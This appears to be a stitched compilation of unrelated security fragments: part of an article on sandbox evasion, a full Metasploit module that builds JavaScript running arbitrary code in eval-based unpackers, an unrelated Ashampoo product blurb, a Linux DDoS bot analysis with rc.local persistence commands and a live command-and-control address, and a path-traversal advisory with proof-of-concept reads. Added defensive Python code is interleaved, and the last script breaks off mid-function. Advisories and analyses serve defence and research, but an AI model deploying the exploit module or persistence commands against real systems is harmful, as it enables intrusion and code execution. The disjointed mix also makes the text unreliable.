     Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities, as PDF readers and office suites do. Therefore, an attacker can create a malicious website the web browser will not be able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code.

     Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password protected archive, the usual analysis solutions won't be able to take a look inside the archive and determine whether it contains malicious files.

     Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly set up web server. Therefore, an analysis solution should be able to parse various image file formats in order to determine whether they contain anything out of the ordinary, like a malicious payload.

     Code [python, vbs, ps1]: an attacker can also distribute malicious code written in an appropriate programming/scripting language, which is later processed by some application on the victim's machine. An example of such is a PowerShell (ps1) macro included in a Word document, which gets executed at the user's request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word.

     Techniques for Detecting Automated Environments

     Various techniques exist for detecting automated malware analysis environments, which are being incorporated into malware samples. When malware binaries use different checks to determine whether they are executing in a controlled environment, they usually don't execute malicious actions upon environment detection. The picture below presents an overview of malware and the techniques it can use to detect if it's being executed in an automated environment. In order to make the picture clearer, we'll describe the process in detail. Once the malware has infected the system, it can be running in user or kernel mode, depending upon the exploitation techniques. Usually malware is running in user mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel mode. Whether malware is executed in user or kernel mode, there are multiple techniques malware can use to detect if it's being executed in an automated malware analysis environment. At the highest level, the techniques are divided into the following categories:

     Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain an understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult.
     Anti-Disassembly Tricks: this category isn't directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn't have much impact in automated malware analysis environments.

     Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of a sandbox environment is to emulate different parts of the system, or the whole system, to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below.

     Virtualized Programs: Chromium Sandbox, Sandboxie
     Linux Containers: LXC, Docker
     Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU

     Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be perfect candidates for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by a virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis service uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMware, etc.

     According to the virtualization technology being used, a malware sample can use different techniques to detect that it's being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without executing the malicious code. In this section we've seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques malware can use to detect if it's being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it's being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless.

     Conclusion

     In this article we've presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all the file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won't be analyzed correctly, resulting in false positives.

     Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, not every sample can be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis.

     Source
  8. Metasploit module as posted:

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::JSObfu

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Javascript Injection for Eval-based Unpackers',
      'Description'    => %q{
        This module generates a Javascript file that executes arbitrary code when an
        eval-based unpacker is run on it. Works against js-beautify's P_A_C_K_E_R unpacker.
      },
      'Author'         => [ 'joev' ],
      'License'        => MSF_LICENSE,
      'References'     => [ ],
      'Platform'       => 'nodejs',
      'Arch'           => ARCH_NODEJS,
      'Privileged'     => false,
      'Targets'        => [['Automatic', {}]],
      'DisclosureDate' => 'Feb 18 2015',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('FILENAME', [true, 'The file name.', 'msf.js']),
      OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.'])
    ], self.class)
  end

  def exploit
    p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded);
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))")
  end
end
```

Source
  9. Product Description

Get organized automatically. Don’t spend time hunting down and organizing your files manually! Ashampoo Media Sync scans, identifies and organizes your media for you into categories (Documents, Music, Pictures, Video) – automatically.

Files instantly organized. No more file chaos! Just plug in your device. MediaSync will do the rest!

Setting up takes only seconds. Select input location. Select output location. Select file types. Done!

Compatible with all autoplay-enabled devices: CDs, DVDs, flash drives, smartphones, digital cameras and more. You name it, MediaSync supports it!

The application consists of three main steps which you have to follow in order to sort your files. The first enables you to choose the source folder and the file category you want to sync (images, music, videos, documents), the second allows you to select the destination path and the third simply gives the all clear signal for the entire process. Ashampoo Media Sync can be used to synchronize content between mobile phones, tablets, external drives and so on, which makes it handy for scenarios in which you made a mess of things by copying stuff to the aforementioned devices without giving too much thought to sorting.

Features:
– Syncing happens in the background
– Folder structures are preserved
– File types are automatically recognized, files get organized into four categories (Documents, Music, Pictures, Video)
– All auto-play-enabled devices are supported (CD, DVD, flash drives, smartphones, digital cameras and more)

With Ashampoo Media Sync, organizing files is as easy as 1, 2, 3!
1. Select input location
2. Select output location
3. Select file types

Ashampoo Media Sync will scan, identify and organize your media into categories for you (Documents, Music, Pictures, Video) – automatically, every time.
  10. The malware is not Elknot, IptabLesx or Billgates; it is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one.. so the next variant may be more..). Originated from China, with the spreading method via ssh hacking. The malware was first spotted a few times in mid 2014. This sample is not the first sample/a new one. This sample was served in the panel below, noted: just being released sample:

Some notes:

Flood mitigation can be applied to filter this specific header (reff: .rodata:0x080ED38F && .rodata:0x080ED474):

```
Accept-Language: zh-cn
Accept-Language: zh-CN
```

Autostart installation:

```
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
```

Source files (unstripped): crtstuff.c, AES.cpp, main.cpp, eh_personality.cc, eh_alloc.cc, eh_exception.cc, eh_call.cc, pure.cc, eh_globals.cc, del_op.cc, eh_catch.cc, class_type_info.cc, allocator-inst.cc, string-inst.cc, eh_terminate.cc, eh_term_handler.cc, si_class_type_info.cc, eh_throw.cc, eh_unex_handler.cc, vterminate.cc, tinfo.cc, new_op.cc, eh_type.cc, cp-demangle.c, functexcept.cc, regex.cc, system_error.cc, functional.cc, future.cc, new_handler.cc, bad_typeid.cc, bad_alloc.cc, eh_ptr.cc, guard.cc, guard_error.cc, bad_cast.cc, ios_failure.cc, stdexcept.cc, condition_variable.cc, mutex.cc, thread.cc, unwind-dw2.c, unwind-dw2-fde-dip.c, libgcc2.c, unwind-c.c

Some PoC of AES:

```
.text:0804832C ; AES::AES(unsigned char *)
.text:0804832C public _ZN3AESC2EPh
;;
.text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char [4][4])
.text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h
```

DDoS functions (13 of them): SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood

```
;; DDOS 1
0x0804EE62:
    mov     eax, [ebp+arg_0]
    mov     eax, [eax+18Ch]
    cmp     eax, 28h
    jg      short 0x0804EE9D
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    jmp     short 0x0804EEC8

;; DDOS 2
0x0804EE9D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create

;; DDOS 3
0x0804EEED:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 4
0x0804EF3D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 5
0x0804EF8D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 6
0x0804EFDD:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 7
0x0804F02D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 8
0x0804F07D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 9
0x0804F0CD:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 10
0x0804F11D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 11
0x0804F16D:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 12
0x0804F1BD:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1

;; DDOS 13
0x0804F20A:
    mov     eax, [ebp+var_C]
    shl     eax, 2
    lea     edx, id[eax]
    mov     eax, [ebp+arg_0]
    mov     [esp+0Ch], eax
    mov     dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
    mov     dword ptr [esp+4], 0
    mov     [esp], edx
    call    pthread_create
    add     [ebp+var_C], 1
```

System command interface for execution.. this is bad... a hacked server can be used as a RAT:

```
.text:0x0804E6C2 ; Cmdshell(_MSGHEAD *)
.text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD
.text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near
.text:0x0804E6C2
.text:0x0804E6C2 arg_0= dword ptr 8
.text:0x0804E6C2
.text:0x0804E6C2 push    ebp
.text:0x0804E6C3 mov     ebp, esp
.text:0x0804E6C5 sub     esp, 18h
.text:0x0804E6C8 mov     eax, [ebp+arg_0]
.text:0x0804E6CB add     eax, 100h
.text:0x0804E6D0 mov     [esp], eax
.text:0x0804E6D3 call    system
.text:0x0804E6D8 leave
.text:0x0804E6D9 retn
.text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp
.text:0x0804E6D9
```

We can expect CPU info in the below format to be sent to the remote:

```
.text:0x080509E2 lea     eax, [ebp+var_1110]
.text:0x080509E8 add     eax, 68h
.text:0x080509EB mov     [esp+4], eax
.text:0x080509EF lea     eax, [ebp+var_1110]
.text:0x080509F5 add     eax, 64h
.text:0x080509F8 mov     [esp], eax
.text:0x080509FB call    _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *)
.text:0x08050A00 lea     eax, [ebp+var_11D0]
.text:0x08050A06 mov     [esp], eax
.text:0x08050A09 call    sysinfo
.text:0x08050A0E mov     [ebp+var_24], eax
.text:0x08050A11 mov     eax, [ebp+var_11C0]
.text:0x08050A17 shr     eax, 14h
.text:0x08050A1A mov     [ebp+var_10A4], eax
.text:0x08050A20 mov     edx, [ebp+var_11C0]
.text:0x08050A26 mov     eax, [ebp+var_11BC]
.text:0x08050A2C mov     ecx, edx
.text:0x08050A2E sub     ecx, eax
.text:0x08050A30 mov     eax, ecx
.text:0x08050A32 shr     eax, 14h
.text:0x08050A35 mov     [ebp+var_10A0], eax
.text:0x08050A3B lea     ebx, [ebp+var_43C]
.text:0x08050A41 mov     eax, 0
.text:0x08050A46 mov     edx, 100h
.text:0x08050A4B mov     edi, ebx
.text:0x08050A4D mov     ecx, edx
.text:0x08050A4F rep stosd
.text:0x08050A51 mov     ebx, [ebp+var_10A0]
.text:0x08050A57 mov     ecx, [ebp+var_10A4]
.text:0x08050A5D mov     edx, [ebp+var_10A8]
.text:0x08050A63 mov     eax, [ebp+var_10AC]
.text:0x08050A69 mov     dword ptr [esp+20h], offset aHacker ; "Hacker"
.text:0x08050A71 mov     [esp+1Ch], ebx
.text:0x08050A75 mov     [esp+18h], ecx
.text:0x08050A79 mov     [esp+14h], edx
.text:0x08050A7D mov     [esp+10h], eax
.text:0x08050A81 lea     eax, [ebp+var_1110]
.text:0x08050A87 mov     [esp+0Ch], eax
.text:0x08050A8B mov     dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"...
.text:0x08050A93 mov     dword ptr [esp+4], 400h
.text:0x08050A9B lea     eax, [ebp+var_43C]
.text:0x08050AA1 mov     [esp], eax
.text:0x08050AA4 call    snprintf
.text:0x08050AA9 mov     eax, ds:MainSocket
.text:0x08050AAE test    eax, eax
```

CNC: sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215")
Loc: 119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK

DOWNLOAD Pass: infected

Source
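The post suggests filtering floods on the two hard-coded Accept-Language values. As an added example (not from the post), the Python below applies that idea defensively: the header alone matches every zh-CN-locale browser, so it only reports clients that send a burst of such requests within a time window. The log format and the log lines are constructed for this example; only the two header values come from the post.

```python
from collections import defaultdict

# Accept-Language values the post found hard-coded in the sample's .rodata.
BOT_LANGUAGE_HEADERS = {"zh-cn", "zh-CN"}

# Constructed request log for this example: "<epoch> <client ip> <path> <Accept-Language>".
# 203.0.113.7 bursts with the bot header, 198.51.100.3 is a slow zh-CN browser,
# 192.0.2.9 bursts without the bot header.
SAMPLE_LOG = """\
1000 203.0.113.7 /index.php zh-cn
1000 203.0.113.7 /index.php zh-cn
1001 203.0.113.7 /index.php zh-cn
1001 203.0.113.7 /index.php zh-cn
1002 203.0.113.7 /index.php zh-cn
1002 203.0.113.7 /index.php zh-cn
1000 198.51.100.3 /news zh-CN
1050 198.51.100.3 /news/1 zh-CN
1100 198.51.100.3 /news/2 zh-CN
1150 198.51.100.3 /news/3 zh-CN
1200 198.51.100.3 /news/4 zh-CN
1250 198.51.100.3 /news/5 zh-CN
1000 192.0.2.9 /index.php en-US
1000 192.0.2.9 /index.php en-US
1000 192.0.2.9 /index.php en-US
1000 192.0.2.9 /index.php en-US
1000 192.0.2.9 /index.php en-US
1000 192.0.2.9 /index.php en-US
1000 192.0.2.9 /index.php en-US
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, ip, path, accept_language)."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, ip, path, lang = parts
    return int(ts), ip, path, lang


def max_requests_in_window(timestamps, window):
    """Largest number of requests that fall within any span of `window` seconds."""
    times = sorted(timestamps)
    best = left = 0
    for right, t in enumerate(times):
        while t - times[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def flood_sources(log_text, window=10, threshold=5):
    """Return sorted (ip, burst) pairs for clients that sent more than `threshold`
    requests carrying one of the bot's Accept-Language values inside `window` seconds.
    The comparison is exact (case-sensitive) because the bot uses fixed strings."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] in BOT_LANGUAGE_HEADERS:
            per_ip[rec[1]].append(rec[0])
    flagged = []
    for ip, times in per_ip.items():
        burst = max_requests_in_window(times, window)
        if burst > threshold:
            flagged.append((ip, burst))
    return sorted(flagged)


if __name__ == "__main__":
    for ip, burst in flood_sources(SAMPLE_LOG):
        print(f"{ip}: {burst} bot-tagged requests within 10 s")
```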
  11. Document Title:
===============
ES File Explorer v3.2.4.1 - Path Traversal Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1435

CVE-ID:
=======
CVE-2015-1876

Release Date:
=============
2015-02-17

Vulnerability Laboratory ID (VL-ID):
====================================
1435

Common Vulnerability Scoring System:
====================================
7.8

Product & Service Introduction:
===============================
ES File Explorer is a free all-in-one including a file manager & application & tasks, support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer. It allows Android users around the world to manage their resources for free; you can see the files on your phone, access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G, EDGE or WiFi, and share with friends.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application.

Vulnerability Disclosure Timeline:
==================================
2015-02-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
ES APP GROUP
Product: ES File Explorer - Mobile Web Application (Android) 3.2.4.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A Path Traversal web vulnerability has been discovered in the official ES File Explorer v3.2.4.1 mobile android web-application. The security vulnerability allows a remote attacker to make unauthorized requests for local files and device system paths to compromise the application or device.

The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continue the request. The attack vector is located on the application-side of the service and the request is http.

The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise.

Request Method(s):
[+] POST & Sync

Vulnerable Module(s):
[+] content://com.estrongs.files/

Vulnerable Parameter(s):
[+] path

Affected Module(s):
[+] content://com.estrongs.files/system/

Proof of Concept (PoC):
=======================
The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs ---

```
Package: com.estrongs.android.pop
Application Label: ES File Explorer
Process Name: com.estrongs.android.pop
Version: 3.2.4.1
Data Directory: /data/data/com.estrongs.android.pop
APK Path: /data/app/com.estrongs.android.pop-2.apk
UID: 10235
GID: [3003, 3002, 3001, 1015, 1028]
Permissions:
- android.permission.WRITE_SETTINGS
- android.permission.CHANGE_WIFI_STATE
- android.permission.CHANGE_NETWORK_STATE
- android.permission.INTERNET
- android.permission.SET_WALLPAPER
- android.permission.ACCESS_NETWORK_STATE
- android.permission.ACCESS_WIFI_STATE
- com.android.launcher.permission.INSTALL_SHORTCUT
- com.android.launcher.permission.UNINSTALL_SHORTCUT
- android.permission.BLUETOOTH
- android.permission.BLUETOOTH_ADMIN
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.WRITE_MEDIA_STORAGE
- android.permission.WAKE_LOCK
- android.permission.READ_PHONE_STATE
- android.permission.ACCESS_SUPERUSER
- android.permission.VIBRATE
- .PERMISSION
- android.permission.CHANGE_WIFI_MULTICAST_STATE
- android.permission.SYSTEM_ALERT_WINDOW
- android.permission.GET_TASKS
- android.permission.READ_EXTERNAL_STORAGE
Defines Permissions:
- None
Activities:
com.estrongs.android.pop.view.FileExplorerActivity
com.estrongs.android.pop.app.compress.CompressionActivity
com.estrongs.android.pop.app.compress.CompressionProxyActivity
com.estrongs.android.pop.app.ESFileSharingActivity
com.estrongs.android.pop.app.SaveToESActivity
com.estrongs.android.pop.app.LocalFileSharingActivity
com.estrongs.android.pop.app.PopVideoPlayer
com.estrongs.android.pop.app.PopVideoPlayerProxyActivity
com.estrongs.android.pop.app.AudioPlayerProxyActivity
com.estrongs.android.pop.app.editor.PopNoteEditor
com.estrongs.android.pop.app.FileChooserActivity
com.estrongs.android.pop.app.ESContentChooserActivity
com.estrongs.android.pop.app.ESRingtoneChooserActivity
com.estrongs.android.pop.app.ESWallPaperChooserActivity
com.estrongs.android.pop.app.DownloaderActivity
com.estrongs.android.pop.app.BrowserDownloaderActivity
com.estrongs.android.pop.app.PopRemoteImageBrowser
com.estrongs.android.pop.ftp.ESFtpShortcut
com.estrongs.android.pop.app.ShowDialogActivity
com.estrongs.android.pop.app.AppCheckUpdateList
com.estrongs.android.pop.app.DefaultWindowSetting
com.estrongs.android.pop.app.DocumentExtModifyList
com.estrongs.android.pop.app.TransitActivity
Broadcast(Receiver):
com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver
com.baidu.share.message.ShareReceiver
com.estrongs.android.pop.EnableOEMConfig
com.estrongs.android.pop.app.InstallMonitorReceiver
com.estrongs.android.pop.app.StartServiceReceiver
Services:
com.estrongs.android.pop.bt.OBEXFtpServerService
Permission: null
Providers:
Authority: com.estrongs.files
Read Permission: null
Write Permission: null
Content Provider: com.estrongs.android.pop.app.FileContentProvider
Multiprocess Allowed: False
Grant Uri Permissions: True
```

```
read content://com.estrongs.files/system/../../../../../sdcard/<file>
```

Read file hosts:

```
read content://com.estrongs.files/system/etc/hosts
127.0.0.1 localhost
```

Solution - Fix & Patch:
=======================
In the AndroidManifest.xml file of each application that contains a content provider, it is recommended that read and write permissions are set.

Vulnerable code:

```
com.estrongs.files
Read Permission: null
Write Permission: null
android:exported="true"
```

Change "true" to "false". When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it.

```xml
<provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/>
```

Fixed code:

```xml
<provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/>
```

```
read content://com.estrongs.files/system/etc/hosts
Permission Denial: opening provider com.estrongs.android.pop.app.FileContentProvider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid=10216) that is not exported from uid 10235
```

Security Risk:
==============
The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8)

Credits & Authors:
==================
Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source
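The fix in the advisory is a manifest change (android:exported="true" with no read/write permission on the provider). As an added example, not part of the advisory or the app, the Python below audits an AndroidManifest.xml for exactly that configuration, including the pre-API-17 case where a provider without an android:exported attribute is exported by default. The two manifests are constructed for this example; only the com.estrongs.files authority and the FileContentProvider class name come from the advisory.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest that reproduces the advisory's provider declaration,
# plus a permission-guarded provider and a legacy one with no exported attribute.
VULNERABLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.estrongs.android.pop">
  <uses-sdk android:minSdkVersion="9" android:targetSdkVersion="19"/>
  <application>
    <provider android:authorities="com.estrongs.files" android:exported="true"
              android:grantUriPermissions="true"
              android:name="com.estrongs.android.pop.app.FileContentProvider"/>
    <provider android:authorities="com.example.guarded" android:exported="true"
              android:readPermission="com.example.permission.READ_GUARDED"
              android:name="com.example.GuardedProvider"/>
    <provider android:authorities="com.example.legacy"
              android:name="com.example.LegacyProvider"/>
  </application>
</manifest>
"""

# The advisory's fix applied to the constructed manifest.
FIXED_MANIFEST = VULNERABLE_MANIFEST.replace(
    'android:authorities="com.estrongs.files" android:exported="true"',
    'android:authorities="com.estrongs.files" android:exported="false"')


def _android_attr(elem, name):
    """Read an android:<name> attribute; ElementTree exposes it in Clark notation."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _sdk_levels(root):
    """minSdkVersion/targetSdkVersion from <uses-sdk>, with Android's fallbacks
    (minSdkVersion defaults to 1, targetSdkVersion to minSdkVersion)."""
    uses_sdk = root.find("uses-sdk")
    min_sdk = target_sdk = None
    if uses_sdk is not None:
        min_sdk = _android_attr(uses_sdk, "minSdkVersion")
        target_sdk = _android_attr(uses_sdk, "targetSdkVersion")
    min_sdk = int(min_sdk) if min_sdk else 1
    target_sdk = int(target_sdk) if target_sdk else min_sdk
    return min_sdk, target_sdk


def exposed_providers(manifest_xml):
    """Return (authorities, reason) for every <provider> that any other app can
    query without holding a permission, i.e. the state the advisory describes.
    android:grantUriPermissions is ignored: it lets the app hand out per-URI
    grants, it does not restrict direct access to an exported provider."""
    root = ET.fromstring(manifest_xml)
    min_sdk, target_sdk = _sdk_levels(root)
    # A provider with no android:exported attribute is exported by default only
    # when minSdkVersion or targetSdkVersion is 16 or lower.
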